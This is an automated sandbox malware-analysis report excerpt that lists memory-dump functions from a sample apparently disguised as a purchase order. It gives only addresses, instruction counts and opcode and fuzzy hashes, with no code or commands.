Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c7cb55b0c47696cdc63d8ec34e15e2261992f541bfa0ad3b9a4e5dc89b564d2
Instruction ID: aba692f254f629ec0af06f908e3cec65ab0fb48ae774c07da0d9df237ef4092d
Opcode Fuzzy Hash: 4c7cb55b0c47696cdc63d8ec34e15e2261992f541bfa0ad3b9a4e5dc89b564d2
Instruction Fuzzy Hash: AED022310486408FD300CF20EC48B823F60AB05315F004082FA084B272C332C804CB41

Function 05843CC0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4371becaa1c8013393e07dd45f82611a5e4e00dbe4a03306d28e3629afd1f5f1
Instruction ID: b64e58dc01e06ca946911086ac320fc412e7946b2b5b02ec1b22577ae221ed24
Opcode Fuzzy Hash: 4371becaa1c8013393e07dd45f82611a5e4e00dbe4a03306d28e3629afd1f5f1
Instruction Fuzzy Hash: 13C04C76E1001E9BCF04DBD9E4408DCF774EF94325F004036D214B7104D6305566CF51

Function 05B098D1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe88eb3228f07cd2c0188fcd40b81b249466045c8b9090d9e0c330a0cad258d
Instruction ID: 43aa92f8bab818290fa3eb3d8a797d4e28d8155ce309194d1395deae55888b6a
Opcode Fuzzy Hash: fbe88eb3228f07cd2c0188fcd40b81b249466045c8b9090d9e0c330a0cad258d
Instruction Fuzzy Hash: DDD0C974E0120CCFDB10DF65D490B9DB7B1FB04300F10A19A9849A3245D6305E84DF10

Function 05B1AE21 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed22869ffbfa85a72cefef375008c68b781d4e442da87ce295739f6550f5040b
Instruction ID: 037b0a0ffacd69797b90eb03d608576a94b6fa08365d42f4c0a80bd7279d73e6
Opcode Fuzzy Hash: ed22869ffbfa85a72cefef375008c68b781d4e442da87ce295739f6550f5040b
Instruction Fuzzy Hash: 7EC08CB30086408FC3818F60EE0CA833FB09B2232271680A2E184CB173C728CA18CB14

Function 0584AA78 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 040d82a382ee693117624ef35b16e6e8a03d23510d1961ee6503e2651f59c7dd
Instruction ID: 6dd8079d2618c776587ea376e668ccbef1f7ced47c19ea3547fc017b7910a632
Opcode Fuzzy Hash: 040d82a382ee693117624ef35b16e6e8a03d23510d1961ee6503e2651f59c7dd
Instruction Fuzzy Hash: 73C08C301001088BD308AB50E04AB2A3AA2DB82365F010428A402361D5CF785C85CB80

Function 05B1AE30 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 05B11AD0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887e253a3f86676c8255067009c1cee86540ccdecd48dd07e8c101a4f1fe7c7a
Instruction ID: ab13d9c02e43d91b4507a862b4f3f39a23b3fa34caa0468e6e3d89ef9cba94e2
Opcode Fuzzy Hash: 887e253a3f86676c8255067009c1cee86540ccdecd48dd07e8c101a4f1fe7c7a
Instruction Fuzzy Hash: BEC08C71810A008FDB00CF00C94DF86BAA6EB40312F02807AB449CA00CCB710400EE11

Function 05B1EF20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8782e80799cf464452dfe22d1593f1e4775951079566bd7f407d6f15e3c347f1
Instruction ID: 32a91bbef177351ab915b2d90bd8bef3edb4fe297d45a9353fd4393f08444afd
Opcode Fuzzy Hash: 8782e80799cf464452dfe22d1593f1e4775951079566bd7f407d6f15e3c347f1
Instruction Fuzzy Hash: 99B0923A010208AB86009B98E804C55BF69AB9A700740C029A609061228B33A822EA94

Non-executed Functions

Function 05B11648 Relevance: 2.8, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

,q, xrefs: 05B1173E
(q, xrefs: 05B119EC

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q$,q
API String ID: 0-275420656
Opcode ID: 09a8f2d97afc911c86b39d56c004145379a628bc9cb48cdfb74d96426cdd0118
Instruction ID: 2bf9117d9b27afbd9f05d4f163ab973725b54c91d5fa4544571c7a7c8247ee81
Opcode Fuzzy Hash: 09a8f2d97afc911c86b39d56c004145379a628bc9cb48cdfb74d96426cdd0118
Instruction Fuzzy Hash: 58D11834A00604CFDB54DF69C584AA9B7F2FF88310F65C5A9E916AB361CB35EC42CB54

Function 00D22090 Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

4'q, xrefs: 00D22182
4'q, xrefs: 00D22157

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 1802e2798557d3369ec54b0088203fb25ad0cd2cab905d4a4cf3a3d6cb91466b
Instruction ID: 5c889d4065cd117f0e43d252de02868079bdf5119676dce1ab60f5ec36447c35
Opcode Fuzzy Hash: 1802e2798557d3369ec54b0088203fb25ad0cd2cab905d4a4cf3a3d6cb91466b
Instruction Fuzzy Hash: 1271E075E006048FD708DFAAFD51A99BBF2BBC4300F18C129E404AB279EB74590BDB91

Function 00D220A0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 00D22182
4'q, xrefs: 00D22157

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 0338038dcb0b6e852752a1ca471d30d67838e0a90d2557785e566370e6ad6275
Instruction ID: b907dac9eb67201f7564b3f1533d8660de1ded44cf0a8663284677f21eb21149
Opcode Fuzzy Hash: 0338038dcb0b6e852752a1ca471d30d67838e0a90d2557785e566370e6ad6275
Instruction Fuzzy Hash: 6471DE75E006048FD708DFAAFD41A99BBF2BB84300F18C129E404AB279EB75590B9B91

Function 05AF3370 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

dq, xrefs: 05AF35E3

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: dq
API String ID: 0-4057445327
Opcode ID: 826dc8f6e9020e19bc3addfe798f7657d7b41e9a5344e7da0978e1f2fcd5a6b6
Instruction ID: de23e1f5b5df1b69bf14aaf964c43630cd0c66e073a50301db15fb570aa7d278
Opcode Fuzzy Hash: 826dc8f6e9020e19bc3addfe798f7657d7b41e9a5344e7da0978e1f2fcd5a6b6
Instruction Fuzzy Hash: 12814570E05218CFDF14DFA9D944BADBBF2FB49301F14916AE209A7264DB74998ADF00

Function 05AF3380 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

dq, xrefs: 05AF35E3

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: dq
API String ID: 0-4057445327
Opcode ID: 8d29752e1c87555fb0e2eb1bf6d12665acd66eb6d7aa254509a84a7daeb54695
Instruction ID: 1bbabb9d48b05feef7162522712b6e76d2d637fb2276877268082d48c9706ebb
Opcode Fuzzy Hash: 8d29752e1c87555fb0e2eb1bf6d12665acd66eb6d7aa254509a84a7daeb54695
Instruction Fuzzy Hash: AD713470E05218CFDB14DFA9D944BADBBF2FB49301F10956AE209A7264DB745D8ACF40

Function 00D226F0 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

X, xrefs: 00D22876

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3081909835
Opcode ID: 0b2818224cb9e55474ccb7b33b9e8d0094b110e1bc4d32149bcbfca027b6ec91
Instruction ID: 9bb8f1e0062b5fdb37454ea761505cf859101c8d78daf21e6c725efad1f27391
Opcode Fuzzy Hash: 0b2818224cb9e55474ccb7b33b9e8d0094b110e1bc4d32149bcbfca027b6ec91
Instruction Fuzzy Hash: CB512D71D056688BEB1CCF6B9D406DAFAF3AFC9300F54C1F6954CAA258DB704AC58E11

Function 05844332 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

O, xrefs: 05844421

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: 27261ae0ad29bcf05309436e5ae20b67296c4b378c807de5b059e90b59db52cd
Instruction ID: 4a37cacccc76a434f98d1ea2bd3573722756920dfa19bed6ecb698fe5e7d68cf
Opcode Fuzzy Hash: 27261ae0ad29bcf05309436e5ae20b67296c4b378c807de5b059e90b59db52cd
Instruction Fuzzy Hash: 6D415071D05A189BEB18CF6B9D4469EFAF7AFC9301F14D0B9980CAA255DB301A86CF11

Function 057DD5D0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

6, xrefs: 057DD69F

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-498629140
Opcode ID: 928fc60006c04961513052695d013038d7ad1ec192083a8fe3d5b676009bff26
Instruction ID: 9054cd5cae4807a35c08836f98c23abc6929d356856083ac45545a98a88031c3
Opcode Fuzzy Hash: 928fc60006c04961513052695d013038d7ad1ec192083a8fe3d5b676009bff26
Instruction Fuzzy Hash: 1541C971D056288BEB68DF6BC84879EFAF7AFC8300F14C1AAC40DA6254DB710A85DF54

Function 05AF0040 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f169b5e6e6a87bdd640be625e73e9de5849fd79aa4cb6ad97742bbf8ed97f716
Instruction ID: 04d1d30c5c13a763c5175f7b6ca5aa05c9cb6ff6548757b681d2b5953447cc1a
Opcode Fuzzy Hash: f169b5e6e6a87bdd640be625e73e9de5849fd79aa4cb6ad97742bbf8ed97f716
Instruction Fuzzy Hash: E1024974B01715CFDB08CFA9C499A3EFBF2BB88300F248529E66697351CB74A941CB94

Function 058420F8 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ed3631dde053c7c75ca171c18c5a34fc523556916ae85023fe23a9d5285a7e
Instruction ID: 5dfb54437578812de17456f5ce5a57ceecb39647cbbc586fe7cc507df2fc1792
Opcode Fuzzy Hash: 66ed3631dde053c7c75ca171c18c5a34fc523556916ae85023fe23a9d5285a7e
Instruction Fuzzy Hash: F912B274E046588BDB14CFAAC98069DFBF2BF88304F24C169E859EB219D734AD46CF54

Function 057DA530 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 774d3cdc335b5da19ede12bfb4003c68f6b1e928ce41ea9e3080c62ebcf4d68b
Instruction ID: 3327f24c2d53f8078fa016f486d5e2797945a980725d7843bec32203384e73aa
Opcode Fuzzy Hash: 774d3cdc335b5da19ede12bfb4003c68f6b1e928ce41ea9e3080c62ebcf4d68b
Instruction Fuzzy Hash: 6481AAB4D05219CBDB04CFAAC5487EDFBF2BB48354F10906AD40AB7240D7794A89EF65

Function 05AF3F00 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f83b5e04914d3dcad0b67fe47079ec74f1ad187b84e22827ed5389628dd2fc5
Instruction ID: 45264b46fbeeee8024ec444b8183fd4f775213b10032e13afe964fc50583ac7f
Opcode Fuzzy Hash: 9f83b5e04914d3dcad0b67fe47079ec74f1ad187b84e22827ed5389628dd2fc5
Instruction Fuzzy Hash: 02812774A05208CFDF14DFA9D444BAEBBF2FF49305F10812AE51AA72A4DB78594ACF10

Function 05AF3F10 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb23b8d40d350aff91dc5bcb2b28a5322dda3e35844ca7e84f84f3df768f7aa
Instruction ID: addac10737412e09a6c53f745f6858a3bc3247aba48bcc16ebb2c475d97eaad1
Opcode Fuzzy Hash: 1cb23b8d40d350aff91dc5bcb2b28a5322dda3e35844ca7e84f84f3df768f7aa
Instruction Fuzzy Hash: 8D813874A05208CFDF14DFA9D444BAEBBF2FF49301F10802AE51AA7294DB74584ACF10

Function 05B00C92 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cba63271d115cc89d991c6b982f6faada9ce8dd328c41e7217b4b11f21e5a7d
Instruction ID: 1019ba8249535732057090bccb242d65cceff18feefd2af45826a4b4050cedc3
Opcode Fuzzy Hash: 4cba63271d115cc89d991c6b982f6faada9ce8dd328c41e7217b4b11f21e5a7d
Instruction Fuzzy Hash: B2814B74E05608CFDB14EFA9D848BADBBF2FB49301F5090A9D40AA7395DB30A946DF10

Function 05B00CA0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e4b5cdb760fa3ff68496ccb99acae1e3a8e51fa9636affe90810253c842cc6f
Instruction ID: 1b0a151f0001527d122b2ae7b6318f886c7680adce45f067b0dce9e6ceb666ea
Opcode Fuzzy Hash: 9e4b5cdb760fa3ff68496ccb99acae1e3a8e51fa9636affe90810253c842cc6f
Instruction Fuzzy Hash: 7E814974E4560CCFDB14EFA9D448BADBBF2FB49301F50A0A9D40AA7294DB34A946DF10

Function 05B094A0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2379c713c8b9def569dc31dce037b44d18674f5c9e901eef7e3f2289fc76f5
Instruction ID: e2a393f3ad1091c90d0f6e9f2d20b9c1c132f24decc23f51367625c6ab83ed9c
Opcode Fuzzy Hash: 2b2379c713c8b9def569dc31dce037b44d18674f5c9e901eef7e3f2289fc76f5
Instruction Fuzzy Hash: C681E874E15318CFDB54DF69D844BADBBF6FB89300F1091A9E40AA7295DB30A986CF01

Function 05B09490 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa26bff59f50a5542b8bc33e372b5de4c21c53bbab792a7c4043f624ff9eaf0
Instruction ID: ca43cc7b51613efb768336b699d9caa73431ff04e39ce99910a92bd006c6f84a
Opcode Fuzzy Hash: caa26bff59f50a5542b8bc33e372b5de4c21c53bbab792a7c4043f624ff9eaf0
Instruction Fuzzy Hash: 42811874E15318CFDB54DF69D944BADBBF2FB89300F1491A9E40AA7295DB30A986CF00

Function 05B00FBC Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 973fcb3d25e5514c6eb9b1af96c1ee0dc8cc5af8ddc9e3130206e4fb250ca3f1
Instruction ID: d0845b510d6417af1c00ecd37f84c0b600255785feed4c5e7b163a1839ddf9da
Opcode Fuzzy Hash: 973fcb3d25e5514c6eb9b1af96c1ee0dc8cc5af8ddc9e3130206e4fb250ca3f1
Instruction Fuzzy Hash: 00715D74E0560CCFCB14EFA9D488BADBBF2FB49301F5491A9D409A72A4DB30A946DF10

Function 05CACBA8 Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fee9a04ca18a3320edb8aafd6c8724b6d574fb9d60d719b20d0d5abf26ce244
Instruction ID: 19b2d4876334f5148cba4fd5e312e3bf3d17faa0828ea461d219b26a533c3a10
Opcode Fuzzy Hash: 4fee9a04ca18a3320edb8aafd6c8724b6d574fb9d60d719b20d0d5abf26ce244
Instruction Fuzzy Hash: A7610975D04219CBDB14CF6AD844BADBFB6BF49308F1098A9E009BB251DB759D85CF40

Function 05B00E5D Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa5534914ba8e897cb0141711a00699db2aa89aba8b8e6f06009304bab236538
Instruction ID: 8a7973b2f4e11f412a93f1dda655b473ed5bba93de6960547aeb1ad3bc13a6ee
Opcode Fuzzy Hash: aa5534914ba8e897cb0141711a00699db2aa89aba8b8e6f06009304bab236538
Instruction Fuzzy Hash: F2715C74E0460CCFCB14EFA9D488BADBBF2FB49301F5490A9D409A72A4DB30A946DF10

Function 05AF3A88 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44718fad94965f053e495e19ff3e1511df437cc6eb286a1c7ecc4355ee4925ad
Instruction ID: abcb8d714135a72be8bcc3ae4acf69202ecda6be4bcf639b4a32290a996a518e
Opcode Fuzzy Hash: 44718fad94965f053e495e19ff3e1511df437cc6eb286a1c7ecc4355ee4925ad
Instruction Fuzzy Hash: B9510170906218CFCF14DFAAE858BEDBBF2FB49305F14942AE509A7294C775984ACF10

Function 05AF3A7B Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fd2fa1e176c87800ce40fabdf91fc0d6b40080943ee27c909e371d7fad83f5
Instruction ID: 77d6ad639f9462db577a1a7d8c744f1f494892011a5bc2834daa164f5cead8d3
Opcode Fuzzy Hash: 90fd2fa1e176c87800ce40fabdf91fc0d6b40080943ee27c909e371d7fad83f5
Instruction Fuzzy Hash: 04510070906218CFCF04DFA9E858BEDBBB2FB49305F14942AE509A7294C775994ACF10

Function 058420E8 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5212f3b399092d1c8c0c4f5d2cdbd3dc6a0c189c869c53de374c552b148762
Instruction ID: b41f07d1afbaea2633554ec0ede0fe745f52ecdd9226bced3cfbb7151bab67dd
Opcode Fuzzy Hash: 1c5212f3b399092d1c8c0c4f5d2cdbd3dc6a0c189c869c53de374c552b148762
Instruction Fuzzy Hash: C1415775E046198BDB08CFABD94069EFBF3AFC8300F14C07AD919AB254EB3059468F54

Function 057D0255 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c667c1db2a454bf224bcddf098f2ce28c53981f5c8230e957efde3ebfc472e
Instruction ID: 88bcdc270307a8a5e4906ac4c275811375d5919a04dd1de12c1bdb0ee2414865
Opcode Fuzzy Hash: 12c667c1db2a454bf224bcddf098f2ce28c53981f5c8230e957efde3ebfc472e
Instruction Fuzzy Hash: E641E1B4D04358DFDB14CFA9D989B9EFBF1BB09300F20A129E815A7250E774A885CF55

Function 05AF3C8D Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec3bb16eb5a60c48ae6ec2560c923e434652d0f90e5a7b1805cf5c616419390
Instruction ID: 08486600b3cb988535e9abc1e859686f5a62424d260705694b657a64f1eafc83
Opcode Fuzzy Hash: 5ec3bb16eb5a60c48ae6ec2560c923e434652d0f90e5a7b1805cf5c616419390
Instruction Fuzzy Hash: 54410174A06218CFCF14DFA9E458BADBBF2FF49301F14546AE109A7295C775994ACF00

Function 057D0260 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf100a71552b87bb69a44066b500965d08c6076680f540df2bcdbc74a08041a
Instruction ID: bf9cae8937498aedcf3b5d3aa6a77d924e5e9487d158ec1b5191d1ca92b206da
Opcode Fuzzy Hash: aaf100a71552b87bb69a44066b500965d08c6076680f540df2bcdbc74a08041a
Instruction Fuzzy Hash: 1E41D0B4D00348DFDB14CFA9D989B9EFBF1BB09300F20A129E815AB250E7749885CF55

Function 05AFFE00 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

